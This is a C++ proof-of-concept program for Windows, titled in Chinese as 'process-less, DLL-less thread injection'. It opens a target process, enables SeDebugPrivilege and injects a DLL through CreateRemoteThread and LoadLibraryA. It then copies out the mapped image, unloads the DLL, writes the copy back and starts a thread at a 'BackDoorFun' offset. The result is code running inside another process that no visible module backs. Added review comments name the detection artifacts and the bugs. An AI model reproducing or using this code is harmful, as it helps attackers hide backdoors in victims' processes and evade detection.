#include "stdafx.h"
#include "windows.h"
#include "stdio.h"
#include "Psapi.h"
#include "Tlhelp32.h"

// Proof-of-concept console program (non-UNICODE build presumed -- the string
// literals passed to GetModuleHandle/GetCurrentDirectory are plain char --
// TODO confirm) that loads a DLL into another process, copies the mapped
// image out, unloads the DLL, writes the copy back at the original base
// address, and starts a thread at a fixed offset into that copy.
//
// NOTE(review): from a detection standpoint every step below is a
// cross-process action taken through documented Win32 APIs: OpenProcess with
// PROCESS_ALL_ACCESS, enabling SeDebugPrivilege, VirtualAllocEx with
// PAGE_EXECUTE_READWRITE, WriteProcessMemory, CreateRemoteThread pointing at
// LoadLibraryA / FreeLibrary, ReadProcessMemory of a whole module image, and
// a final CreateRemoteThread whose start address is not backed by a loaded
// module. Those are the artifacts an EDR or memory-forensics pass would key
// on; none of them are hidden by this code.
//
// NOTE(review): the program never closes hRemoteProcess, hRemoteThread,
// hNewThread, hthSnapshot or hToken, and never deletes `buffer`; it returns
// 0 on every failure path, so the exit code carries no status.

// Looks up the loaded-module entry for `Dllfullname` in process `ProcessID`
// via a Toolhelp module snapshot. On success `Thread` (a MODULEENTRY32 the
// caller must have initialised with dwSize) holds the entry, chiefly
// modBaseAddr and modBaseSize. Returns FALSE if the snapshot cannot be taken,
// if the module list is empty, or if no entry's szExePath equals
// `Dllfullname` exactly (case-sensitive strcmp).
// NOTE(review): hthSnapshot is never passed to CloseHandle on any path.
BOOL GetThreadInformation(DWORD ProcessID,char* Dllfullname,MODULEENTRY32 &Thread)
{
    HANDLE hthSnapshot = NULL;
    // Snapshot of all modules mapped in the target process.
    hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID);
    if (hthSnapshot == NULL) return FALSE;
    // Position on the first module in the list.
    BOOL bMoreMods = Module32First(hthSnapshot, &Thread);
    if (bMoreMods == FALSE) return FALSE;
    // Walk the list until the entry whose full path matches.
    for (;bMoreMods; bMoreMods = Module32Next(hthSnapshot, &Thread))
    {
        if (strcmp(Thread.szExePath, Dllfullname) == 0) break;
    }
    // After the loop `Thread` is either the match or the last entry
    // visited, so the comparison is repeated to tell the two apart.
    if (strcmp(Thread.szExePath, Dllfullname) == 0) return TRUE;
    else return FALSE;
}

// Enables the named privilege (the caller passes SE_DEBUG_NAME) in the
// access token of `hProcess`. Returns FALSE if the token cannot be opened,
// the privilege name cannot be resolved to a LUID, or the adjustment call
// fails.
// NOTE(review): AdjustTokenPrivileges returns TRUE even when the privilege
// was not actually granted (GetLastError == ERROR_NOT_ALL_ASSIGNED); that
// case is not distinguished here. hToken is never closed.
BOOL AdjustPrivileges(HANDLE hProcess,LPCTSTR lpPrivilegeName)
{
    //******************************************************
    // Adjust process privileges
    //******************************************************
    HANDLE hToken;
    TOKEN_PRIVILEGES tkp;
    // Open the process token with rights to query and adjust privileges.
    if (!::OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return FALSE;
    // Resolve lpPrivilegeName to its LUID.
    if(!::LookupPrivilegeValue(NULL, lpPrivilegeName, &tkp.Privileges[0].Luid)) return FALSE;
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    // Previous state is not requested (NULL buffer, zero length).
    if(!::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0)) return FALSE;
    return TRUE;
}

// Classic "LoadLibrary via remote thread" DLL injection: writes the
// NUL-terminated DLL path into `hProcess` and starts a remote thread whose
// entry point is LoadLibraryA and whose single argument is that path.
// Returns FALSE if the allocation, the write, the LoadLibraryA lookup or the
// thread creation fails. Success only means the thread was created; the DLL
// load itself is not awaited or verified here (main() relies on a Sleep).
// NOTE(review): the string buffer is allocated PAGE_EXECUTE_READWRITE
// although it only ever holds data; the remote thread handle is never
// closed; the remote buffer is never freed.
BOOL InjectRemoteProcess(HANDLE hProcess,char* Dllfullname)
{
    // Reserve+commit space in the target for the full DLL path.
    PSTR pDllName=NULL;
    if((pDllName=(PSTR)::VirtualAllocEx(hProcess, NULL, strlen(Dllfullname)+1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE))==NULL) return FALSE;
    BOOL writecode;
    if((writecode=::WriteProcessMemory(hProcess, pDllName, Dllfullname, strlen(Dllfullname)+1, NULL))==0) return FALSE;
    // Address of LoadLibraryA in kernel32.dll; looked up in this process and
    // reused in the target, which relies on kernel32 sharing a base address
    // across processes (true for system DLLs on the same session).
    PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
    if (pfnThreadRtn== NULL) return FALSE;
    // Start the remote thread.
    HANDLE hRemoteThread=NULL;
    if((hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn,
        pDllName, // LoadLibrary argument: address of the path string inside the target process (multiple arguments would need a struct)
        0, NULL))==NULL) return FALSE;
    return TRUE;
}

// Unloads a module from `hProcess` by running FreeLibrary(Address) on a
// remote thread, where `Address` is the module base (HMODULE). Blocks until
// that thread exits. Returns FALSE if the FreeLibrary lookup or the thread
// creation fails; the FreeLibrary result itself is not inspected.
BOOL UnistallDll(HANDLE hProcess,BYTE * Address)
{
    // Address of FreeLibrary in kernel32.dll (same cross-process assumption
    // as in InjectRemoteProcess).
    HANDLE hThread = NULL;
    PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "FreeLibrary");
    if (pfnThreadRtn == NULL) return FALSE;
    // Remote thread that executes FreeLibrary.
    hThread = ::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, Address, 0, NULL);
    if (hThread == NULL) return FALSE;
    // Wait for the remote thread to finish.
    ::WaitForSingleObject(hThread, INFINITE);
    // Release the thread handle.
    ::CloseHandle(hThread);
    return TRUE;
}

// Hard-coded target process id for this run of the PoC.
#define pid 3844
// Offset of the exported function inside the author's own dll.dll; it is a
// build-specific RVA and is meaningless for any other DLL.
#define BackDoorFun 0x1014

// Entry point. Sequence: open target -> enable SeDebugPrivilege -> inject
// "<cwd>\dll.dll" -> wait -> find the module entry -> copy the mapped image
// out -> FreeLibrary it -> re-allocate at the same base -> write the copy
// back -> start a thread at base + BackDoorFun.
// NOTE(review): Dllfullname is built with GetCurrentDirectory(255, ...)
// followed by two unchecked strcat calls into the same 255-byte array;
// GetCurrentDirectory's return value is not checked either.
// NOTE(review): GetThreadInformation returns BOOL, but the result is stored
// in a DWORD named RemoteTheadAddress and tested against 0 -- the name is
// misleading; it is only a success flag.
// NOTE(review): ReadProcessMemory's return value is ignored; `read` may be
// less than Thread.modBaseSize and the later write still sends the full size.
int main(int argc, char* argv[])
{
    char Dllfullname[255];
    char Dllname[255];
    // Open the target process with full access.
    HANDLE hRemoteProcess=NULL;
    if((hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))==NULL)
    {
        printf("OpenProcess faile!!");
        return 0;
    }
    BOOL Adjust=AdjustPrivileges(hRemoteProcess,SE_DEBUG_NAME);
    if(Adjust==FALSE)
    {
        printf("Adjust process Privileges faile!!\n");
        return 0;
    }
    // Build the full path of the DLL: current directory + "\" + "dll.dll".
    strcpy(Dllname,"dll.dll");
    ::GetCurrentDirectory(255,Dllfullname);
    strcat(Dllfullname,"\\");
    strcat(Dllfullname,Dllname);
    BOOL Res=InjectRemoteProcess(hRemoteProcess,Dllfullname);
    if(Res==FALSE)
    {
        printf("Inject Faile!!\n");
        return 0;
    }
    // Give the remote LoadLibrary thread time to run; otherwise the module
    // snapshot below does not yet contain the DLL. (Fixed delay, not a
    // synchronisation -- TODO: this is a race by construction.)
    ::Sleep(300);
    DWORD RemoteTheadAddress=0;
    MODULEENTRY32 Thread = {sizeof(Thread)};;
    RemoteTheadAddress=GetThreadInformation(pid,Dllfullname,Thread);
    if(RemoteTheadAddress==0)
    {
        printf("Get RemoteTheadAddress Faile!!\n");
        return 0;
    }
    // Local buffer holding a copy of the DLL image as mapped in the target.
    // NOTE(review): `buffer` is never deleted.
    char *buffer=new char[Thread.modBaseSize+1];
    DWORD read;
    ::ReadProcessMemory(hRemoteProcess,
        Thread.modBaseAddr, // base address of the loaded DLL module
        buffer,
        Thread.modBaseSize, // size of the mapped module
        &read);
    // Unload the DLL from the target.
    BOOL Unstall=UnistallDll(hRemoteProcess,Thread.modBaseAddr);
    if(Unstall==FALSE)
    {
        printf("Unistall dll Faile!!!\n");
        return 0;
    }
    // Re-allocate at the original module base so that the copied image's
    // absolute addresses remain valid. Fails if that range is no longer free.
    LPVOID Alloc;
    Alloc=::VirtualAllocEx(hRemoteProcess,Thread.modBaseAddr,Thread.modBaseSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    if(Alloc== NULL)
    {
        printf("VirtualAllocEx Failed!!\n");
        return 0;
    }
    BOOL Writer;DWORD Written;
    Writer=::WriteProcessMemory(hRemoteProcess,Thread.modBaseAddr,buffer,Thread.modBaseSize,&Written);
    if(Writer==0)
    {
        printf("WriteProcessMemory Failed!!\n");
        return 0;
    }
    // Start a thread in the target at the copied image; no DLL module entry
    // backs this region any more.
    HANDLE hNewThread=NULL;
    if((hNewThread=::CreateRemoteThread(hRemoteProcess, NULL, 0,
        (PTHREAD_START_ROUTINE)(Thread.modBaseAddr+BackDoorFun), // base of the written data + export entry offset
        NULL, // argument for the exported function; this PoC's export takes none (an argument would have to be written into the target like the path above)
        0, NULL))==NULL)
    {
        printf("CreateNewThread faile!!\n");
        return 0;
    }
    return 0;
}
VC++實現無進程無dll線程注射技術